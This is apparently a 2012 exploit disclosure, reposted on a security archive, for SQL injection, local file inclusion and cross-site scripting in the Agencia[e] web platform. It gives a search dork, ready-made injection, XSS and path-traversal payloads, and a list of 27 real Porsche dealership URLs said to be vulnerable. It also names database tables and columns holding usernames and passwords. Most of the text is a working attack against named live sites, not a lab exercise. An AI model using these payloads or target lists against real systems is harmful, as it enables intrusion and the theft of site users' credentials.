Sites using Agencia[e] suffer from cross site scripting, local file inclusion, and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
33214a7e0b37867304fa84e40e5eb67bc5518bce9a0bff9de4fbabcf42906abb
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_4n1@live.com
# Line: GreyHat
# Exploit Title: Agencia[e] - SQL Injection / LFI / XSS Vulnerabilities
# Dork: intext: inurl:eventos_mas.php?ideve=
# Date: 16/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.agenciae.tv/
# Vendor Name: Agencia[e]
# Tested On: Backtrack R3 / Linux Mint
# Type: php
# Info: Offical Center Porsche In Spain
------------------- Agreement --------------------
[12/11/2012] - Vulnerability discovered
[15/11/2012] - Vendor notified Dont responsed
[16/11/2012] - Public disclosure
--------------------------------------------------
# Expl0it/P0c ###################
http://site.com/eventos_mas.php?ideve= < Sql Vulnerability Path >
http://site.com/eventos_mas.php?ideve= < LFi Vulnerability Path >
http://site.com/eventos_mas.php?ideve= < XSS Vulnerability Path >
# Exploit/Comand/Sql=> +union+select+1,2,3,4--+
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Exploit/Comand/Lfi=> /../../../../../../../etc/passwd%00/../../../
# Payload/Comand/Sql=> table_schema=00x5E6536C65716672756732423423 / table_name=0x44F6277C616670x5E6536C65756546269
# Demo_Xss_Sql_Vulnerabilities
http://www.porsche-valencia.com/eventos_mas.php?ideve=14'
http://www.porsche-madridoeste.com/eventos_mas.php?ideve=201'
http://www.porsche-barcelona.com/eventos_mas.php?ideve=237'
http://www.porsche-alicante.com/eventos_mas.php?ideve=184'
http://www.porsche-pamplona.com/eventos_mas.php?ideve=351'
http://www.porsche-bilbao.com/eventos_mas.php?ideve=353'
http://www.porsche-ibercarrera.com/eventos_mas.php?ideve=356'
http://www.porsche-zaragoza.com/eventos_mas.php?ideve=105'
http://www.porsche-murcia.com/eventos_mas.php?ideve=474'
http://www.porsche-malaga.com/eventos_mas.php?ideve=436'
http://www.porsche-castellon.com/eventos_mas.php?ideve=291'
http://www.porsche-marbella.com/eventos_mas.php?ideve=160'
http://www.porsche-canarias.com/eventos_mas.php?ideve=182'
http://www.porsche-madridnorte.com/eventos_mas.php?ideve=175'
http://porsche-baleares.com/eventos_mas.php?ideve=73'
http://porsche-asturias.com/eventos_mas.php?ideve=418'
http://www.porsche-sevilla.com/eventos_mas.php?ideve=443'
http://www.porsche-acoruna.com/eventos_mas.php?ideve=424'
http://www.centrosporsche.com/centros/eventos_mas.php?ideve=51'
http://porsche-valladolid.com/eventos_mas.php?ideve=59'
http://www.porsche-pamplona.com/eventos_mas.php?ideve=53'
http://www.porsche-ibercarrera.com/eventos_mas.php?ideve=288'
http://www.porsche-tenerife.com/eventos_mas.php?ideve=9'
http://www.porsche-braga.com/eventos_mas.php?ideve=243'
http://www.porsche-faro.com/eventos_mas.php?ideve=314'
http://www.porsche-lisboa.com/eventos_mas.php?ideve=219'
http://www.porsche-leiria.com/eventos_mas.php?ideve=220'
# The Same Tables And Columns All Site Vulnerability
+----------+
| control |
| eventos |
| noticias |
| usuarios |
+----------+
+---------+
| Column |
+---------+
| alias |
| id |
| nombre |
| pwd |
| sid |
| url |
| usuario |
+---------+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed